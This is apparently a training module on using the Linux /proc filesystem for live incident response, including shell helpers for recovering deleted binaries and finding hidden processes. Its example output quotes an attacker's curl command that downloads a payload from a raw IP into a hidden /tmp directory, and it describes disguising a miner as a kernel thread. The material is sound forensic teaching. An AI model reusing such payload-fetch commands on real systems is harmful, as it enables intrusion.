The Linux /proc Filesystem as a Forensic Evidence Source

Module 0

What "everything is a file" means for evidence

Linux exposes the live, running system as files: the processes executing right now, the network connections they hold, and the actual program behind each one are all readable with ordinary file commands. This subsection is about the design decision behind that, the /proc filesystem, and why it is the most trustworthy source on a compromised host.

It is the mechanism under most of the live-response work in the course. Section 0.3 told you memory and process state are collectable and fast-decaying; this subsection shows you how the kernel hands them to you, and why an attacker's user-space malware cannot easily lie to it.

A design decision with forensic consequences

Linux inherits a principle from Unix that sounds like a slogan until you see what it buys an investigator: everything is a file. A document is a file, obviously. But so is a hard disk (/dev/sda), a terminal, a source of random numbers (/dev/urandom), and, most usefully for incident response, the state of every running process. The kernel maintains a special filesystem, mounted at /proc, that does not contain files on any disk. Its contents are generated on the fly by the kernel to represent the live system. When you read a file under /proc, you are reading the kernel's current answer to a question about what is running right now.

This is why Linux is so transparent to an investigator. On a system that hid its internals, you would need special tooling and privileged interfaces to learn what a process is doing. On Linux, you ask the kernel by reading a file, with the same cat, ls, and readlink commands you already know. The process that is beaconing to an attacker's server cannot hide from this, because the kernel itself is reporting on it, and the kernel is the one thing on the host the attacker's user-space malware cannot easily lie to.

It is worth pausing on why that last point holds. Malware runs in user space, the unprivileged layer where ordinary programs execute. The information under /proc is generated by the kernel, the privileged core that actually schedules processes, owns memory, and brokers every network packet. For a process to falsify what /proc reports, it would need to subvert the kernel itself, which requires a far deeper and rarer compromise than dropping a script and adding a cron job. The overwhelming majority of intrusions, the living-off-the-land pattern this course centers on, never touch the kernel at all. They run as www-data or root in user space, fully visible to a kernel that has no reason to cover for them. This is why /proc is the investigator's anchor: it is the most trustworthy narrator on a compromised host.

Reading a process from /proc

Every running process has a numeric process ID, its PID, and a corresponding directory under /proc. A process with PID 2148 has a directory at /proc/2148, and inside it the kernel exposes everything it knows about that process. Four entries do most of the investigative work: exe, a symbolic link to the binary the process is executing; cmdline, the full command line it was started with; cwd, a link to its current working directory; and fd, a directory of links to every file, pipe, and socket it has open.

Four entries, four answers the kernel gives about any running process. None of them depends on the process describing itself honestly: the kernel reports what the process actually is, which is why these four entries are where a live investigation starts.

Take the suspicious process from Section 0.1, the curl that the web user was running. Suppose ps showed it as PID 2148. You ask the kernel what binary is actually behind it:

reading the live process

$ readlink /proc/2148/exe
/usr/bin/curl
$ cat /proc/2148/cmdline | tr '\0' ' '
curl -s http://203.0.113.40/x -o /tmp/.cache/up
$ readlink /proc/2148/cwd
/var/www/html
$ ls -l /proc/2148/fd
0 -> /dev/null   1 -> pipe:[48211]   3 -> socket:[48230]

In four reads you have established that PID 2148 is the real curl binary, fetching from a raw IP into a hidden directory, launched from the web root, with an open network socket. The kernel told you all of it, and none of it depended on trusting the process to describe itself.
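The four reads above can be wrapped into one helper so the same questions are asked of any PID in the same order. This is a minimal sketch, not part of any standard tool: the function name proc_summary and its optional second argument (an alternative root directory, useful for running it against a copied or mounted /proc tree) are assumptions made for illustration.

```shell
# Summarise the four core /proc entries for one PID.
# Usage: proc_summary PID [PROC_ROOT]   (PROC_ROOT defaults to /proc)
# proc_summary and PROC_ROOT are illustrative names, not a standard tool.
proc_summary() {
    local dir fd
    dir="${2:-/proc}/$1"
    if [ ! -d "$dir" ]; then
        echo "no such process: $1" >&2
        return 1
    fi

    # exe and cwd are symbolic links maintained by the kernel.
    echo "exe:     $(readlink "$dir/exe")"
    # cmdline is NUL-separated; turn the separators into spaces.
    echo "cmdline: $(tr '\0' ' ' < "$dir/cmdline")"
    echo "cwd:     $(readlink "$dir/cwd")"
    # Each fd entry is a link to whatever the descriptor refers to.
    for fd in "$dir"/fd/*; do
        if [ -L "$fd" ]; then
            echo "fd ${fd##*/}: $(readlink "$fd")"
        fi
    done
    return 0
}
```

Calling proc_summary 2148 on the live host prints one line per entry. Reading another user's process this way generally requires root.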

Why /proc defeats common attacker tricks

Reading from /proc matters most because it sees through deception that fools the ordinary commands. An attacker can rename their malicious binary to look innocent, calling it [kworker/0:1] to mimic a kernel thread. The ps output then shows a believable name. But /proc/<PID>/exe is a kernel-maintained link to the actual file on disk, and it does not care what the process called itself. readlink on it returns the true path, exposing that the supposed kernel worker is really /tmp/.x/miner.

Better still, attackers frequently delete their binary from disk after launching it, so that a later examiner finds nothing to analyze. When a running process's executable has been deleted, the kernel records this in the exe link, which now points at the original path marked (deleted). That marker is itself a strong indicator of compromise, because legitimate software rarely deletes its own running binary; the usual benign case is a service still running after a package upgrade replaced its file on disk. And because the kernel still holds the file open on behalf of the running process, you can often recover the deleted executable in full by copying it straight back out of /proc/<PID>/exe while the process lives. The attacker deleted the file from the filesystem, but the kernel never let go of it, and /proc is your door to it.

The name a process chooses and the binary the kernel is actually running are two separate facts. The attacker controls the first and cannot touch the second, which is why you read the second.
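The gap between the chosen name and the real binary can be checked mechanically. The sketch below relies on one property of genuine kernel threads: they have an empty cmdline and no executable, so their exe link cannot be resolved. A process whose command line starts with a bracket, in the style ps uses for kernel threads, yet whose exe link does resolve, is therefore worth a closer look. The function name fake_kthread and the optional root argument are hypothetical, and the check is a heuristic rather than proof.

```shell
# Flag a process that presents a bracketed, kernel-thread-style name
# yet has a real executable behind it. Heuristic only.
# Usage: fake_kthread PID [PROC_ROOT]
# Prints a finding and returns 0 if suspicious, returns 1 otherwise.
fake_kthread() {
    local dir name exe
    dir="${2:-/proc}/$1"
    # The first NUL-separated field of cmdline is the name the process chose.
    name=$(tr '\0' '\n' 2>/dev/null < "$dir/cmdline" | head -n 1)
    # Genuine kernel threads have no executable, so readlink yields nothing.
    exe=$(readlink "$dir/exe" 2>/dev/null)
    case $name in
        "["*)
            if [ -n "$exe" ]; then
                echo "PID $1 claims to be $name but is running $exe"
                return 0
            fi
            ;;
    esac
    return 1
}
```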

Principle

Trust the kernel's view over the process's self-description. Anything a process controls, its name in ps, its own log output, files it writes, it can falsify. The kernel-maintained entries under /proc describe what the process actually is and does, independent of what it claims. When the two disagree, the disagreement is evidence.

Recovering that deleted miner is two commands, and it is the difference between an incident report that says "a process was running an unknown binary" and one that hands the malware to analysis. While the process is alive, the kernel is still holding its executable open, so you copy it straight out of the exe link:

recovering a deleted running binary

$ readlink /proc/4471/exe
/tmp/.x/miner (deleted)
$ cp /proc/4471/exe /evidence/miner-4471
# the binary the attacker thought they had destroyed, now yours to hash and analyse

The recovered file is a complete, runnable copy. You hash it, submit it to analysis, and the cleanup the attacker performed to leave you nothing has left you the whole sample instead, on the one condition that you reached it before the process exited.
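Copying and hashing are worth doing as one step, so the sample is never stored without a digest beside it. The following is a sketch under assumptions: recover_exe, the exe-PID output naming, and the optional root argument are illustrative choices, and sha256sum is assumed to be available as it is on most Linux distributions.

```shell
# Copy a running process's executable out of /proc and record its SHA-256.
# Usage: recover_exe PID DEST_DIR [PROC_ROOT]
# recover_exe and the exe-PID file naming are illustrative choices.
recover_exe() {
    local out
    out="$2/exe-$1"
    # cp follows the exe link, so it reads the content the kernel still
    # holds open even when the link text ends in "(deleted)".
    cp "${3:-/proc}/$1/exe" "$out" || return 1
    # Store the digest next to the sample so later copies can be verified.
    sha256sum "$out" > "$out.sha256" || return 1
    echo "$out"
}
```

For the example above, recover_exe 4471 /evidence would write /evidence/exe-4471 and /evidence/exe-4471.sha256, and sha256sum -c on the second file confirms the first is unchanged.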

Anti-pattern

Triaging a suspected-compromised host with ps and netstat and trusting the output is the anti-pattern, because those are exactly the user-space tools a rootkit replaces or hooks to hide the processes and connections you are hunting. A tampered ps can simply omit the malicious PID, and you would never know it was there. Reading the kernel's own view, the numbered directories under /proc and the socket table ss requests from the kernel, is the harder-to-fool path: hiding from it requires subverting the kernel itself, a far rarer and deeper compromise. When the stakes are high, cross-check the friendly tool against the raw kernel source, and treat any disagreement, a PID in /proc that ps does not list, as a finding in its own right.
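The cross-check described here can be sketched as a filter: feed it the PIDs a tool reports, and it prints any numbered directory under /proc the tool left out. The name hidden_pids and its optional root argument are assumptions for illustration. Two caveats apply. A process that starts between the two snapshots will appear as a false positive, so repeat the check before drawing conclusions. And because ps itself reads /proc, this catches a tampered ps binary, not a rootkit that alters what /proc shows.

```shell
# List PIDs that have a /proc directory but are missing from a PID list.
# Usage: ps -e -o pid= | hidden_pids [PROC_ROOT]
# hidden_pids is an illustrative name, not a standard tool.
hidden_pids() {
    local root listed d pid
    root=${1:-/proc}
    # Normalise the tool's output (stdin) to one bare PID per line.
    listed=$(tr -d ' ')
    for d in "$root"/[0-9]*; do
        [ -d "$d" ] || continue
        pid=${d##*/}
        # -x matches whole lines only, so PID 21 does not match 2148.
        if ! printf '%s\n' "$listed" | grep -qx "$pid"; then
            echo "$pid"
        fi
    done
    return 0
}
```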

Network connections are files too

The same principle extends to the network. Every network connection a process holds appears in its /proc/<PID>/fd directory as a socket, and the kernel exposes the full table of network connections through /proc/net as well. The friendly tools present this same kernel data tied to the owning process, the older netstat by parsing /proc/net and ss by querying the kernel over netlink:

ss -tnp: connections with owning process

State  Local Address       Peer Address        Process
ESTAB  10.0.4.12:54012     203.0.113.40:8080     users:(("curl",pid=2148,fd=3))

That single line ties together the whole finding: the process (curl, PID 2148), the file descriptor (fd=3, the same socket you saw in /proc/2148/fd), and the peer it is talking to (the attacker's address on port 8080). Process, connection, and destination, joined by the kernel. This is the live network state Section 0.3 told you to capture early, and now you know it is the kernel reporting on its own sockets, which is why it is reliable even on a compromised host.
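The same join can be made by hand from the raw table, which is useful when you do not trust the tools on the host. The number inside socket:[...] in the fd listing is the socket's inode, and each row of /proc/net/tcp carries that inode along with the local and remote endpoints in hexadecimal. The sketch below decodes them. It assumes IPv4 and a little-endian host (x86 and most ARM systems), where the four address bytes appear in reverse order; the function names decode_tcp_addr and socket_peer are hypothetical.

```shell
# Decode an IPv4 "ADDRESS:PORT" field from /proc/net/tcp.
# Assumes a little-endian host, where the address bytes appear reversed.
# Usage: decode_tcp_addr 287100CB:1F90
decode_tcp_addr() {
    local hex port a b c d
    hex=${1%%:*}
    port=${1##*:}
    # Split the eight hex digits into four bytes, last byte first.
    a=$(printf '%s' "$hex" | cut -c7-8)
    b=$(printf '%s' "$hex" | cut -c5-6)
    c=$(printf '%s' "$hex" | cut -c3-4)
    d=$(printf '%s' "$hex" | cut -c1-2)
    # printf converts each 0x-prefixed value to decimal.
    printf '%d.%d.%d.%d:%d\n' "0x$a" "0x$b" "0x$c" "0x$d" "0x$port"
}

# Print decoded local and peer endpoints for a socket inode.
# Usage: socket_peer INODE [TABLE]   (TABLE defaults to /proc/net/tcp)
socket_peer() {
    local line
    # Field 10 of each row is the socket inode; fields 2 and 3 are the
    # local and remote endpoints.
    line=$(awk -v ino="$1" '$10 == ino { print $2, $3 }' "${2:-/proc/net/tcp}")
    [ -n "$line" ] || return 1
    echo "$(decode_tcp_addr "${line% *}") -> $(decode_tcp_addr "${line#* }")"
}
```

With the inode from the earlier fd listing, socket_peer 48230 would print the same local and peer endpoints that ss reported for that socket.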

More of what /proc reveals

The four entries covered so far are the ones you reach for first, but a process directory holds more, and each entry answers a specific investigative question. /proc/<PID>/status gives the process state, the real and effective user IDs, and the parent process ID, which tells you who launched it. A bash process whose parent is the web server rather than a login shell is immediately suspicious, because web servers do not normally spawn interactive shells. /proc/<PID>/environ holds the environment variables the process was started with, which can capture an attacker's configuration, the address of a command-and-control server passed as a variable, or credentials left in the environment. /proc/<PID>/maps lists the memory regions the process has mapped, including every shared library it loaded, which is how you spot a process that has loaded something it should not have. None of these requires special tooling. Each is a file you read.
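The parent check can be sketched in a few lines. The status file is plain text with one key per line, and the first number on the Uid line is the real user ID. The helper below pulls the parent PID and real UID from it, then looks up the parent's short name from the parent's comm file. The function name proc_parent and the optional root argument are assumptions for illustration.

```shell
# Print a process's real UID, parent PID, and the parent's short name.
# Usage: proc_parent PID [PROC_ROOT]
# proc_parent is an illustrative name, not a standard tool.
proc_parent() {
    local root ppid uid pname
    root=${2:-/proc}
    [ -r "$root/$1/status" ] || return 1
    # status is "Key:<tab>value" text; the first Uid value is the real UID.
    ppid=$(awk '$1 == "PPid:" { print $2 }' "$root/$1/status")
    uid=$(awk '$1 == "Uid:" { print $2 }' "$root/$1/status")
    # comm holds the short name of the parent process.
    pname=$(cat "$root/$ppid/comm" 2>/dev/null)
    echo "pid=$1 uid=$uid ppid=$ppid parent=${pname:-unknown}"
}
```

A bash process that reports a web server as its parent is the pattern to look for. The environment can be read the same way as cmdline, since it is also NUL-separated: tr '\0' '\n' < /proc/2148/environ prints one variable per line, given sufficient privileges.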

Reading these for a single known-bad PID is the easy case. The harder and more common task is finding the bad PID in the first place among the hundreds a busy server runs, and /proc supports that too. Because every process is a numbered directory, you can sweep all of them at once, asking the same question of each: which processes are running a binary that has been deleted, which are running from /tmp or /dev/shm, which were launched by a service account that should never spawn a shell. A loop over /proc/*/exe that flags every link ending in (deleted) surfaces, in one pass, exactly the processes most likely to be malicious, because, as noted earlier in this section, legitimate software rarely deletes its own running binary. This systematic sweep is the difference between knowing /proc exists and being able to use it under pressure, and Module 8 builds it into a repeatable triage routine.
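A minimal version of that sweep might look like the following. It is a sketch, not the routine Module 8 builds: the function name sweep_exe, the output format, and the optional root argument are assumptions. It flags two of the conditions named above, a deleted executable and an executable running from /tmp or /dev/shm. Run it as root, since the exe links of other users' processes are otherwise unreadable and are silently skipped.

```shell
# Sweep every process and flag deleted or temp-directory executables.
# Usage: sweep_exe [PROC_ROOT]
# sweep_exe and its output format are illustrative choices.
sweep_exe() {
    local root d pid exe
    root=${1:-/proc}
    for d in "$root"/[0-9]*; do
        pid=${d##*/}
        # Kernel threads and processes we may not inspect yield nothing.
        exe=$(readlink "$d/exe" 2>/dev/null) || continue
        case $exe in
            *" (deleted)")     echo "$pid deleted $exe" ;;
            /tmp/*|/dev/shm/*) echo "$pid temp-path $exe" ;;
        esac
    done
    return 0
}
```

Each hit is a lead rather than a verdict: a service left running across a package upgrade also shows a deleted executable, so confirm with the other entries in the process directory before acting.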

The foundation under the course

Almost every live-response technique in the modules ahead rests on what this section established. Memory forensics in Module 7 captures and parses the same process and connection structures, just frozen into an image instead of read live. Malware triage in Module 7 begins by recovering the running binary from /proc before the attacker's cleanup can remove it. The persistence hunt in Section 0.6 and Module 5 checks what processes legitimate services should and should not have spawned. The reason any of this is possible, the reason a standard Linux host will tell you the complete truth about itself if you know which files to read, is the design decision this section opened with. The next section turns from the live system to its recorded history: the logs, where the host writes down what happened so you can read it after the fact.

Next section

0.5: Reading the authentication and system logs

The live system tells you what is happening now. The logs tell you what happened before you arrived. Learn to read the authentication log, the systemd journal, and the audit log, with real entries and what each one reveals.
